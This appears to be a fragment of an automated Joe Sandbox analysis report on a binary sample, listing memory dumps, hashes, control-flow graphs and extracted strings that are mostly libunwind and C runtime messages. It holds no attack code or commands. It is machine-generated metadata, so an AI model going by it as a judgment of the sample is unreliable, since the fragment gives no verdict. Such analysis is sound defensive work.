                                      • Opcode ID: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
                                      • Instruction ID: 58c97d720bc5631419841eeeb12c1dae8392ee41f143058243e1d1de95a83bdb
                                      • Opcode Fuzzy Hash: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
                                      • Instruction Fuzzy Hash: 5C22D07270AB8185EB558F15E8943AD37A9EB04B80F6C4A35DB9D4B3A2DF38E552C310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
                                      • Opcode ID: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
                                      • Instruction ID: faf186a19cc2277e3082509695c363129d2497855b31c83d39e7f5ab6f5d5dd8
                                      • Opcode Fuzzy Hash: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
                                      • Instruction Fuzzy Hash: 6AE1E4B260AB8285EF158F15D9407B967A6EB45B80F6C4A31DE8D8B7D3EF3CE5518300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                      • API String ID: 1646373207-706389432
                                      • Opcode ID: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
                                      • Instruction ID: 39afd4222cf9e76592f90b629cf8d7ad453ab99ac1bd059ab69a9ba5d6aeb684
                                      • Opcode Fuzzy Hash: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
                                      • Instruction Fuzzy Hash: 40E06734E5FA0792EE449F51ED8613423A2BF59754FB84439C81E87362FF6DA15A8310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memcpyrealloc
                                      • String ID: %LaL
                                      • API String ID: 2500458235-3433341929
                                      • Opcode ID: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
                                      • Instruction ID: 7173d6beb421934e38869d6ddc3968946130163923c472820f1a8061d6bb03bc
                                      • Opcode Fuzzy Hash: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
                                      • Instruction Fuzzy Hash: EA916A6BB1C6E112EB394735F550F9D2E61C7A2762F059315CBB403F9ADA2EC2168B04
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b51e2a745836820ae5e51b927a30219108dac0aaa5d01f5bdc8f99822855a4c1
                                      • Instruction ID: 0318dda321e5cc2c8364cdeb657aba231d39519b9c5e011ab0a82644e1c5e563
                                      • Opcode Fuzzy Hash: b51e2a745836820ae5e51b927a30219108dac0aaa5d01f5bdc8f99822855a4c1
                                      • Instruction Fuzzy Hash: C8921732A1D64286E7658F25A65033A77A2FF957C8F284135EE4ED3B96DE3CE441CB00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7eb96e3d47f38f9666091484b2575135f7935362b06e64030a895774840bb5cc
                                      • Instruction ID: d6dd10bef32951a69c8bdf8ae69a2869347c251cee57fc441fccce522749d737
                                      • Opcode Fuzzy Hash: 7eb96e3d47f38f9666091484b2575135f7935362b06e64030a895774840bb5cc
                                      • Instruction Fuzzy Hash: C0A13662B1C79142FB248F15A6207BA67E2FB997D0F288235DE9D83B96DE3DD045C700

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1146 7ff6099b4120-7ff6099b4159 call 7ff6099b8350 call 7ff6099b87f0 1151 7ff6099b415f-7ff6099b4173 1146->1151 1152 7ff6099b4413-7ff6099b441a call 7ff6099b8a70 1146->1152 1153 7ff6099b4198-7ff6099b41ae call 7ff6099b8880 call 7ff6099b8a70 1151->1153 1158 7ff6099b441c-7ff6099b4448 call 7ff6099b3d60 fflush 1152->1158 1159 7ff6099b444d-7ff6099b4467 1152->1159 1164 7ff6099b41b4-7ff6099b41b6 1153->1164 1165 7ff6099b437a-7ff6099b437c 1153->1165 1158->1159 1161 7ff6099b4470-7ff6099b4484 1159->1161 1167 7ff6099b4232-7ff6099b425f call 7ff6099b8a70 1164->1167 1168 7ff6099b41b8-7ff6099b41d0 call 7ff6099b89b0 1164->1168 1165->1161 1169 7ff6099b4382-7ff6099b4394 1165->1169 1183 7ff6099b4261-7ff6099b4287 call 7ff6099b3d60 fflush 1167->1183 1184 7ff6099b428c-7ff6099b428f 1167->1184 1177 7ff6099b41d2-7ff6099b41e4 1168->1177 1178 7ff6099b41e6 1168->1178 1179 7ff6099b43b5-7ff6099b43bb call 7ff6099b3d60 1169->1179 1177->1178 1180 7ff6099b41ed-7ff6099b41f4 call 7ff6099b8a70 1177->1180 1178->1180 1186 7ff6099b43c0-7ff6099b43d3 fflush 1179->1186 1180->1167 1192 7ff6099b41f6-7ff6099b422d call 7ff6099b3d60 fflush 1180->1192 1183->1184 1188 7ff6099b4295-7ff6099b429d 1184->1188 1189 7ff6099b4396-7ff6099b439d call 7ff6099b8a70 1184->1189 1186->1161 1193 7ff6099b42a3-7ff6099b42aa call 7ff6099b8a70 1188->1193 1194 7ff6099b4188-7ff6099b4192 call 7ff6099b87f0 1188->1194 1189->1161 1200 7ff6099b43a3-7ff6099b43ae 1189->1200 1192->1167 1206 7ff6099b42d7-7ff6099b42f8 1193->1206 1207 7ff6099b42ac-7ff6099b42d2 call 7ff6099b3d60 fflush 1193->1207 1194->1152 1194->1153 1200->1179 1213 7ff6099b4340-7ff6099b4347 call 7ff6099b8a70 1206->1213 1214 7ff6099b42fa-7ff6099b4300 1206->1214 1207->1206 1227 7ff6099b4180-7ff6099b4183 call 7ff6099b8920 1213->1227 1228 7ff6099b434d-7ff6099b4375 call 7ff6099b3d60 fflush 1213->1228 1219 7ff6099b43d8-7ff6099b43dc 1214->1219 1220 7ff6099b4306-7ff6099b430d call 7ff6099b8a70 1214->1220 1223 7ff6099b4485-7ff6099b448c call 7ff6099b8a70 1219->1223 1224 7ff6099b43e2-7ff6099b43e9 call 7ff6099b8a70 1219->1224 1220->1194 1233 7ff6099b4313-7ff6099b433b call 7ff6099b3d60 fflush 1220->1233 1223->1161 1235 7ff6099b448e-7ff6099b44ae call 7ff6099b3d60 1223->1235 1224->1152 1237 7ff6099b43eb-7ff6099b440e call 7ff6099b3d60 fflush 1224->1237 1227->1194 1228->1227 1233->1194 1235->1186 1237->1152
                                      APIs
                                      Strings
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK, xrefs: 00007FF6099B438D
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND, xrefs: 00007FF6099B431D
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK, xrefs: 00007FF6099B442B
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p, xrefs: 00007FF6099B42B6
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK, xrefs: 00007FF6099B43F2
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT, xrefs: 00007FF6099B4357
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d, xrefs: 00007FF6099B426B
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx, xrefs: 00007FF6099B4214
                                      • .anonymous., xrefs: 00007FF6099B41E6
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR, xrefs: 00007FF6099B4499
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function, xrefs: 00007FF6099B43AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflush$CaptureContextgetenv
                                      • String ID: .anonymous.$libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p$libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT$libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx$libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d$libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function
                                      • API String ID: 3501801798-3031193476
                                      • Opcode ID: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
                                      • Instruction ID: afcd1038e1ce333c81b0df8845155f4898c7afe7d36e7c3af53c7867adbb9980
                                      • Opcode Fuzzy Hash: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
                                      • Instruction Fuzzy Hash: 2E819F10A0E65341FA14BF62AA163BA6367AF85BC8F6C0039DE4E973D3DE3CE5059341

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1417 7ff6099b3820-7ff6099b3846 call 7ff6099b8a70 1420 7ff6099b3882-7ff6099b388a 1417->1420 1421 7ff6099b3848-7ff6099b387d call 7ff6099b3d60 fflush 1417->1421 1422 7ff6099b388c-7ff6099b3897 1420->1422 1423 7ff6099b38bb-7ff6099b38c8 1420->1423 1421->1420 1424 7ff6099b3c25-7ff6099b3c38 1422->1424 1425 7ff6099b389d-7ff6099b38a1 1422->1425 1426 7ff6099b38f6-7ff6099b3a09 memcpy 1423->1426 1427 7ff6099b38ca-7ff6099b38ce 1423->1427 1425->1424 1429 7ff6099b38a7-7ff6099b38b6 1425->1429 1431 7ff6099b3a19 1426->1431 1432 7ff6099b3a0b-7ff6099b3a17 call 7ff6099b4a70 1426->1432 1427->1426 1430 7ff6099b38d0-7ff6099b38d7 1427->1430 1429->1424 1430->1426 1434 7ff6099b38d9-7ff6099b38eb call 7ff6099b8a70 1430->1434 1437 7ff6099b3a21-7ff6099b3a9d call 7ff6099b86c0 1431->1437 1432->1431 1432->1437 1446 7ff6099b38f1 1434->1446 1447 7ff6099b3ac4-7ff6099b3b05 call 7ff6099b3d60 fflush 1434->1447 1444 7ff6099b3bb5-7ff6099b3bd2 call 7ff6099b8a70 1437->1444 1445 7ff6099b3aa3-7ff6099b3ac2 call 7ff6099b8a70 1437->1445 1444->1447 1454 7ff6099b3bd8 1444->1454 1445->1447 1449 7ff6099b3b0a-7ff6099b3b2f call 7ff6099b8a70 1445->1449 1446->1449 1447->1449 1460 7ff6099b3b31-7ff6099b3b5d call 7ff6099b3d60 fflush 1449->1460 1461 7ff6099b3b62-7ff6099b3b66 1449->1461 1454->1449 1460->1461 1463 7ff6099b3c16-7ff6099b3c1f 1461->1463 1464 7ff6099b3b6c-7ff6099b3b70 1461->1464 1463->1424 1466 7ff6099b3cb6-7ff6099b3cba 1463->1466 1467 7ff6099b3b72-7ff6099b3b78 1464->1467 1468 7ff6099b3bdd-7ff6099b3be1 1464->1468 1469 7ff6099b3d15-7ff6099b3d31 1466->1469 1470 7ff6099b3cbc-7ff6099b3ce7 1466->1470 1467->1424 1474 7ff6099b3b7e-7ff6099b3b87 1467->1474 1472 7ff6099b3be3-7ff6099b3bec 1468->1472 1473 7ff6099b3c39-7ff6099b3cb4 call 7ff6099b8600 * 3 1468->1473 1485 7ff6099b3d38-7ff6099b3d54 call 7ff6099b3d60 fflush abort 1469->1485 1475 7ff6099b3cea-7ff6099b3d13 RtlUnwindEx 1470->1475 1472->1424 1477 7ff6099b3bee-7ff6099b3c11 1472->1477 1473->1475 1474->1424 1479 7ff6099b3b8d-7ff6099b3bb0 1474->1479 1475->1485 1477->1485 1479->1485
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflush$Unwindabortgetenvmemcpy
                                      • String ID: CCG $CCG!$Personality continued unwind at the target frame!$Personality indicated exception handler in phase 2!$Personality installed context during phase 1!$RtlUnwindEx() failed$_GCC_specific_handler$libunwind: %s - %s$libunwind: _GCC_specific_handler(%#010lx(%lx), %p)$libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p)$libunwind: _GCC_specific_handler() personality returned %d
                                      • API String ID: 4246679292-2140983942
                                      • Opcode ID: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
                                      • Instruction ID: 093795590626c5ed87a03dba3f7d642a0fce423414c8d9a87c1d8da893b2f2e7
                                      • Opcode Fuzzy Hash: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
                                      • Instruction Fuzzy Hash: 07D18D21A0AAC282E6349F55E5423F96376FF84784F284135DE8D43792EF3DE595C700

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1494 7ff6099c2bca-7ff6099c2bdb 1495 7ff6099c2fd1 1494->1495 1496 7ff6099c2be1-7ff6099c2bed isxdigit 1494->1496 1498 7ff6099c2fd3-7ff6099c2fe2 1495->1498 1496->1495 1497 7ff6099c2bf3-7ff6099c2bff isxdigit 1496->1497 1497->1495 1499 7ff6099c2c05-7ff6099c2c11 isxdigit 1497->1499 1499->1495 1500 7ff6099c2c17-7ff6099c2c23 isxdigit 1499->1500 1500->1495 1501 7ff6099c2c29-7ff6099c2c35 isxdigit 1500->1501 1501->1495 1502 7ff6099c2c3b-7ff6099c2c47 isxdigit 1501->1502 1502->1495 1503 7ff6099c2c4d-7ff6099c2c59 isxdigit 1502->1503 1503->1495 1504 7ff6099c2c5f-7ff6099c2c6b isxdigit 1503->1504 1504->1495 1505 7ff6099c2c71-7ff6099c2c7d isxdigit 1504->1505 1505->1495 1506 7ff6099c2c83-7ff6099c2c8f isxdigit 1505->1506 1506->1495 1507 7ff6099c2c95-7ff6099c2ca1 isxdigit 1506->1507 1507->1495 1508 7ff6099c2ca7-7ff6099c2cb3 isxdigit 1507->1508 1508->1495 1509 7ff6099c2cb9-7ff6099c2cc5 isxdigit 1508->1509 1509->1495 1510 7ff6099c2ccb-7ff6099c2cd7 isxdigit 1509->1510 1510->1495 1511 7ff6099c2cdd-7ff6099c2ce9 isxdigit 1510->1511 1511->1495 1512 7ff6099c2cef-7ff6099c2cfb isxdigit 1511->1512 1512->1495 1513 7ff6099c2d01-7ff6099c2d0d isxdigit 1512->1513 1513->1495 1514 7ff6099c2d13-7ff6099c2d1f isxdigit 1513->1514 1514->1495 1515 7ff6099c2d25-7ff6099c2d31 isxdigit 1514->1515 1515->1495 1516 7ff6099c2d37-7ff6099c2d43 isxdigit 1515->1516 1516->1495 1517 7ff6099c2d49-7ff6099c2d53 1516->1517 1517->1495 1518 7ff6099c2d59-7ff6099c2d5c 1517->1518 1518->1495 1519 7ff6099c2d62-7ff6099c2d81 1518->1519 1520 7ff6099c2d83-7ff6099c2d90 malloc 1519->1520 1521 7ff6099c2dad-7ff6099c2dee 1519->1521 1522 7ff6099c3080-7ff6099c3085 call 7ff6099b2d30 1520->1522 1523 7ff6099c2d96-7ff6099c2daa 1520->1523 1521->1495 1521->1498 1523->1521
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: isxdigit$malloc
                                      • String ID:
                                      • API String ID: 1399014089-0
                                      • Opcode ID: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
                                      • Instruction ID: 91afea40598ea35c257d4e236beb2f689fe84c0ea72736f9f2d801aa8f27e984
                                      • Opcode Fuzzy Hash: 493b3504e96b5132e726ee44de8f28cecf9b5d1527bf54c4c4c996011feb9626
                                      • Instruction Fuzzy Hash: 5A51926160CB8642F7594F249D9063E27B2BF40F41F6C0435CA6DC6BA6EF6CE9A4D210

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1628 7ff6099c7b80-7ff6099c7ba4 1629 7ff6099c7ba6-7ff6099c7ba8 1628->1629 1630 7ff6099c7bad-7ff6099c7bb6 1628->1630 1631 7ff6099c808c-7ff6099c80a2 1629->1631 1632 7ff6099c7c77-7ff6099c7ca3 call 7ff6099c82a0 1630->1632 1633 7ff6099c7bbc-7ff6099c7bc5 1630->1633 1642 7ff6099c7ccf-7ff6099c7cfa 1632->1642 1643 7ff6099c7ca5-7ff6099c7cb2 malloc 1632->1643 1635 7ff6099c7d10-7ff6099c7d32 call 7ff6099c82a0 call 7ff6099bba60 1633->1635 1636 7ff6099c7bcb-7ff6099c7bd4 1633->1636 1635->1629 1661 7ff6099c7d38-7ff6099c7d53 1635->1661 1639 7ff6099c7dc5-7ff6099c7e48 call 7ff6099c82a0 1636->1639 1640 7ff6099c7bda-7ff6099c7be3 1636->1640 1652 7ff6099c7eb7-7ff6099c7ed5 1639->1652 1653 7ff6099c7e4a-7ff6099c7e58 1639->1653 1640->1629 1645 7ff6099c7be5-7ff6099c7bf7 call 7ff6099c7b80 1640->1645 1649 7ff6099c7d01-7ff6099c7d0b 1642->1649 1647 7ff6099c80a3 call 7ff6099b2d30 1643->1647 1648 7ff6099c7cb8-7ff6099c7ccc 1643->1648 1645->1629 1662 7ff6099c7bf9-7ff6099c7c14 1645->1662 1659 7ff6099c80a8-7ff6099c80e1 _assert call 7ff6099c80f0 call 7ff6099b3f50 1647->1659 1648->1642 1649->1631 1660 7ff6099c7f2a-7ff6099c7f31 1652->1660 1657 7ff6099c7e76-7ff6099c7e81 malloc 1653->1657 1658 7ff6099c7e5a-7ff6099c7e6f realloc 1653->1658 1657->1647 1667 7ff6099c7e87-7ff6099c7e8d 1657->1667 1665 7ff6099c7e71 1658->1665 1666 7ff6099c7ea4-7ff6099c7eb0 1658->1666 1663 7ff6099c7f33-7ff6099c7f36 1660->1663 1664 7ff6099c7f38-7ff6099c7f46 call 7ff6099c7b80 1660->1664 1669 7ff6099c7d7f-7ff6099c7dc0 1661->1669 1670 7ff6099c7d55-7ff6099c7d62 malloc 1661->1670 1671 7ff6099c7c40-7ff6099c7c72 1662->1671 1672 7ff6099c7c16-7ff6099c7c23 malloc 1662->1672 1663->1664 1675 7ff6099c7f9d-7ff6099c7fce call 7ff6099bd9a0 1663->1675 1683 7ff6099c8049-7ff6099c806b 1664->1683 1684 7ff6099c7f4c-7ff6099c7f54 1664->1684 1665->1647 1666->1652 1677 7ff6099c7e8f-7ff6099c7e98 memcpy 1667->1677 1678 7ff6099c7e9d 1667->1678 1669->1631 1670->1647 1673 7ff6099c7d68-7ff6099c7d7c 1670->1673 1671->1649 1672->1647 1674 7ff6099c7c29-7ff6099c7c3d 1672->1674 1673->1669 1674->1671 1691 7ff6099c7fd0-7ff6099c7fdd malloc 1675->1691 1692 7ff6099c7ffa-7ff6099c8043 1675->1692 1677->1678 1678->1666 1683->1659 1687 7ff6099c806d-7ff6099c8085 1683->1687 1688 7ff6099c7f1e-7ff6099c7f26 1684->1688 1689 7ff6099c7f56-7ff6099c7f67 1684->1689 1687->1631 1694 7ff6099c8087 free 1687->1694 1688->1660 1695 7ff6099c7ee0-7ff6099c7eef realloc 1689->1695 1696 7ff6099c7f6d-7ff6099c7f78 malloc 1689->1696 1691->1647 1693 7ff6099c7fe3-7ff6099c7ff7 1691->1693 1692->1683 1693->1692 1694->1631 1695->1647 1698 7ff6099c7ef5-7ff6099c7f1a 1695->1698 1696->1647 1697 7ff6099c7f7e-7ff6099c7f84 1696->1697 1699 7ff6099c7f94-7ff6099c7f98 1697->1699 1700 7ff6099c7f86-7ff6099c7f8f memcpy 1697->1700 1698->1688 1699->1698 1700->1699
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflush$Unwind_assertabortmalloc
